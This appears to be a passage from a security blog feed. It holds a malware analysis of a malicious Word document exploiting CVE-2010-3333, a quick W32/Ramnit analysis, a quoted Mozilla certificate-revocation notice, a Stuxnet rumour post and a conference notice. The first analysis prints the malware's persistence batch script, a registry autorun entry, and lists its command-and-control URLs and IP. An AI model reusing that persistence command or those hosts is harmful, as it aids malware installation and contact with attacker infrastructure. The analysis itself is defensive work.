<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhapaZPdbPE9fLMzHbSKgveRjtHrPdIKmHXiAjRLLacdtN5w8okaBDc72QB5X25T2nkIMfKgzg10RsP1b9stkr5JWWgUyWWWoxeM1PpefHt93xXuDi6YR4ZyiRIZskxrnBqMbuHqlwXp4o/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhapaZPdbPE9fLMzHbSKgveRjtHrPdIKmHXiAjRLLacdtN5w8okaBDc72QB5X25T2nkIMfKgzg10RsP1b9stkr5JWWgUyWWWoxeM1PpefHt93xXuDi6YR4ZyiRIZskxrnBqMbuHqlwXp4o/s400/5.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
As I convert the hex format to binary, we can see some interesting strings. I'm not sure why its trying to execute ping command to localhost. Well, after execute the malicious .doc file. It will create a file named csrss.exe (921C724CCB04B9F672B294FFFF83CE7B) and execute it then rename it to 'winword.exe'. Then it will launch the cmd.exe to execute the ping command to 127.0.0.1 with 1 byte. After that, the malware will execute a clean Word.doc file.<br />
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsyai417dQ6cW-y4gE79Xs71lKnHrEhMoJfupJps32EJtDb_K-5pqHqqK871nKtA85s8dE-NfsUDfUyOtczJO5ZEDmta_bUZwVnDe0Oe-Fyky3O2fG7JmUM_hR1an3mdb0F8crp-cAKV8/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="183" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsyai417dQ6cW-y4gE79Xs71lKnHrEhMoJfupJps32EJtDb_K-5pqHqqK871nKtA85s8dE-NfsUDfUyOtczJO5ZEDmta_bUZwVnDe0Oe-Fyky3O2fG7JmUM_hR1an3mdb0F8crp-cAKV8/s400/4.png" width="400" /></a></div>
<br />
The running csrss.exe will create the Update.bat on user StartMenu startup folder with the following content:<br />
<blockquote>
<br />
<pre>Echo off
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\DOCUME~1\User\LOCALS~1\Temp\csrss.exe" /f
del %%0</pre>
<br /></blockquote>
The batch command file will add a startup into user Windows registry pointing to csrss.exe located in user temporary folder. Then, lets take a look through packet capture:<br />
<br />
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRmCS8nCki6ixoEQZv0WkbYdr3ciHDCMVZi8TpT7Lnty7R3Gvj81v59QwypZeVF4kAZKJNveEbxLdipHUuFLkloNesg_Mn5KBQkky2_ta5hvjKraDXcTw-W2UXRqsVbB-6UZtTjyUuoc/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRmCS8nCki6ixoEQZv0WkbYdr3ciHDCMVZi8TpT7Lnty7R3Gvj81v59QwypZeVF4kAZKJNveEbxLdipHUuFLkloNesg_Mn5KBQkky2_ta5hvjKraDXcTw-W2UXRqsVbB-6UZtTjyUuoc/s400/3.png" width="400" /></a></div>
<br />
The captured packet show that the malicious file attempt to POST request to the following URL:<br />
<blockquote>
http://ymhz1.dyndns.biz:8080/<br />
http://2011fm.dyndns.org:8080/<br />
IP Addess: 114.248.90.120</blockquote>
<br />
The IP address was originated from China and still active at the time I was writing these. The csrss.exe will keep running on memory and sleep for every 60 second and check back to the given URL.<br />
<br />
Note: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3333Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-84413077328674080212011-12-02T00:28:00.000+08:002012-08-09T11:51:39.402+08:00W32/Ramnit.C Quick AnalysisI just received a laptop from a friend of mine that heavily infected with multiple viruses. I don't know how he can comfortably using it for few months until he felt so many annoying activities coming from the viruses. One of my interesting sample to be quickly analyze is W32/Ramnit. Based on few security blogs that I found this malware has been already discovered around April 2010. Let's check it out.<br />
<br />
At the first detection I was notice that a lot of infections is coming from the HTML files (as Avira detecting so many HTML infection).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Aotyho56oxKBoj-i0GeLe4FhyphenhyphenwfoJptEcoJgHBxlQsGXFq4jcqv396C41gVt9fk_VsCKqelqLf0pMxCARcQEUwuatSNfMyL_2yQhqSk3N1RVqoOnW0pincq26rYSmchS0KVxsDy6nes/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7Aotyho56oxKBoj-i0GeLe4FhyphenhyphenwfoJptEcoJgHBxlQsGXFq4jcqv396C41gVt9fk_VsCKqelqLf0pMxCARcQEUwuatSNfMyL_2yQhqSk3N1RVqoOnW0pincq26rYSmchS0KVxsDy6nes/s400/11.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
<div style="text-align: left;">
The HTML files contains a small VB Script that carrying embedded EXE files in Hex format that will drop in Windows temporary folder once user opening the infected HTML in their browser (only IE6 support VBScript). At the end of the infected HTML files seem to be a random garbage character in attempt to prevent a static size of HTML files.</div>
<br />
<div style="text-align: left;">
Once the EXE file has been dropped, it will automatically execute the file. The EXE is about 108,032 bytes sizes (9B49FEC7E03C33277F188A2819B8D726). I'll explain quick going through what is the characteristic of the EXE file. The EXE has been compressed with UPX 3.03. Upon execution the following routine will be started:</div>
<ul><br />
<li>Search for EXE, DLL and HTML file extensions.</li>
<br />
<li>Infect all EXE and DLL by creating additional .text section on the PE file.</li>
<br />
<li>Infect HTML files by overwriting it with VBScript and Hexdecimal format of the EXE file.</li>
</ul>
<br />
<div>
The infected PE file will be create an additional PE sections called .text as shown on image below:</div>
<br />
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhqakCFP2RIB9u9Lxij4PJ6LpZbuN-fdZAKE3k7Pe70xl3YyCl6afwdrwBO_5A68pMqa335ICF1wttjUeA9vSysaW9p8PdVFmOXA0BTWW_zp2LTTIot0iSV2JeOuwstIpTAPeXrKNcfE/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkhqakCFP2RIB9u9Lxij4PJ6LpZbuN-fdZAKE3k7Pe70xl3YyCl6afwdrwBO_5A68pMqa335ICF1wttjUeA9vSysaW9p8PdVFmOXA0BTWW_zp2LTTIot0iSV2JeOuwstIpTAPeXrKNcfE/s400/2.png" width="400" /></a></div>
<br />
<div>
A large size of additional .text section (about 540kb) created which is contains a malicious code. The EP has been modify to execute malicous code first and point it back to actual EP to execute original code.</div>
<br />
<div>
Manual cleaning for this type of malware probably impossible for end-user. Mass infection on users PC make it difficult to remove. The best way to fix it is either using <a href="http://adf.ly/P7aF" target="_blank" title="NOD32 On-Demand Scanner (Portable)">NOD32 On-Demand Scanner (Portable)</a> or format your Hard drive and installing new Windows.</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-85907953300458930602011-11-04T20:50:00.000+08:002012-08-06T02:03:18.744+08:00Revoking Trust in DigiCert by Certificate AuthorityJust reading news today about revoking most commonly use cert especially in Malaysia. The news is taken from Mozilla Blog.<br/><blockquote>Issue<br/><br/>Entrust, Inc., a certificate authority in Mozilla’s root program, has informed us that one of their subordinate CAs, the Malaysian company DigiCert Sdn. Bhd, has issued 22 certificates with weak keys. While there is no indication they were issued fraudulently, the weak keys have allowed the certificates to be compromised. Furthermore, certificates from this CA contain several technical issues. They lack an EKU extension specifying their intended usage and they have been issued without revocation information.<br/><br/>This is not a Firefox-specific issue. Nevertheless, given our concerns about the technical practices of this certificate authority, we intend to revoke trust in the DigiCert Sdn. Bhd. intermediate certificate authority.<br/><br/>DigiCert Sdn. Bhd is a Malaysian subordinate CA under Entrust and Verizon (GTE CyberTrust). It bears no affiliation whatsoever with the US-based corporation DigiCert, Inc., which is a member of Mozilla’s root program.<br/><br/>Impact<br/><br/>An attacker could use one of these weak certificates to impersonate the legitimate owners. This could deceive users into trusting websites or signed software appearing to originate from these owners, but actually containing malicious content or software. The certificates in question were issued to a mix of Malaysian government websites and internal systems. We do not believe other sites are at risk.<br/><br/>Status<br/><br/>Mozilla is revoking trust in all certificates issued by DigiCert Sdn. Bhd. and the update will be in Firefox 8 and Firefox 3.6.24. Entrust has issued their own statement on the subject.<br/><br/>Credit<br/><br/>The issue was reported to us by Entrust, Inc.</blockquote><br/>Source: <a href="http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/">http://blog.mozilla.com/security/2011/11/03/revoking-trust-in-digicert-sdn-bhd-intermediate-certificate-authority/</a><br/><br/> <br/><br/> Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-404587311478197992011-04-26T19:00:00.000+08:002012-08-09T11:53:57.707+08:00New Version of Stuxnet 'Stars' ReportedJust read few news today that says new version of stuxnet has been appeared in Iran. At this moment I can't find any sample related to the new stuxnet v2 with codenamed 'Stars'. This news still remain unclear and could be another rumors or just another version of another malware. More update will be available soon.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK29vd6KJrCIzVTQ1yDRttRI1rHnnuM2bwT0_rJyNMhFRpF3sfAgfWkCvgudfgU4O-L6KjKCtlYgp9NEoAgsxUPVZidVjxydu5LOpx4LJpjPhPxd7c0em8tPZ4wh4sxE75LgJeEAvox2o/s1600/Stuxnet1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK29vd6KJrCIzVTQ1yDRttRI1rHnnuM2bwT0_rJyNMhFRpF3sfAgfWkCvgudfgU4O-L6KjKCtlYgp9NEoAgsxUPVZidVjxydu5LOpx4LJpjPhPxd7c0em8tPZ4wh4sxE75LgJeEAvox2o/s400/Stuxnet1.jpg" width="400" /></a></div>
<center>
<br /></center>
UPDATES (1 MAY 2011):<br />
After being investigated from most resources, I was unable to find the sample and strong news about related story. At this moment, I just consider that it is a hoax.<br />
<br />
<strong>News related:</strong><br />
<a href="http://www.f-secure.com/weblog/">http://www.f-secure.com/weblog/</a><br />
<a href="http://blogs.csoonline.com/1483/after_stuxnet_a_star_is_born">http://blogs.csoonline.com/1483/after_stuxnet_a_star_is_born</a><br />
<a href="http://www.google.com.my/search?um=1&hl=en&prmdo=1&biw=1138&bih=519&q=%27stars%27%20stuxnet&ie=UTF-8&sa=N&tab=iw">http://www.google.com.my/search?um=1&hl=en&prmdo=1&biw=1138&bih=519&q=%27stars%27%20stuxnet&ie=UTF-8&sa=N&tab=iw</a>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2797284762054001698.post-19498769642935081012011-04-14T19:36:00.000+08:002012-08-06T02:03:18.550+08:00The 5th annual Counter-eCrime Operations Summit (CeCOS V)<p style="text-align: justify;">The fifth annual Counter-eCrime Operations Summit (CeCOS V) will engage questions of operational challenges and the development of common resources for the first responders and forensic professionals who protect consumers and enterprises from the ecrime threat every day. This year's meeting will focus on the development of response paradigms and resources for counter-ecrime managers and forensic professionals. Presenters will proffer case studies of national and regional economies under attack, narratives of successful trans-national forensic cooperation as well as models for cooperation and unified response against ecrime and data resources for forensic activities.</p><br/><p><center><img src="http://www.antiphishing.org/images/kualaLumpurWebBanner.jpg" alt="CeCOS V" /></center></p><br/><p style="text-align: justify;">The program will be spread across a three-day conference event on April 27, 28 and 29 in <a href="http://maps.google.com/maps/ms?hl=en&ie=UTF8&msa=0&msid=211354629192232708452.0004994579a6db888dd3c&ll=3.155085,101.710954&spn=0.012041,0.016587&z=16">Kuala Lumpur, Malaysia at the Crown Plaza Hotel</a>. The APWG believes under-appreciated operational issues are important enough to be the focus of a conference dedicated exclusively to them. They're often talked about as sidelights but rarely addressed directly as an organizational imperative for the entire counter-ecrime community. CeCOS V makes those operational issue the central focus of the program for the benefit of all ecrime fighters.</p><br/><p style="text-align: justify;"><strong><span style="text-decoration: underline;">References:</span></strong></p><br/><p style="text-align: justify;"><a href="http://www.antiphishing.org/events/2011_opSummit.html">http://www.antiphishing.org/events/2011_opSummit.html</a></p><br/><p style="text-align: justify;"> </p>Unknownnoreply@blogger.com0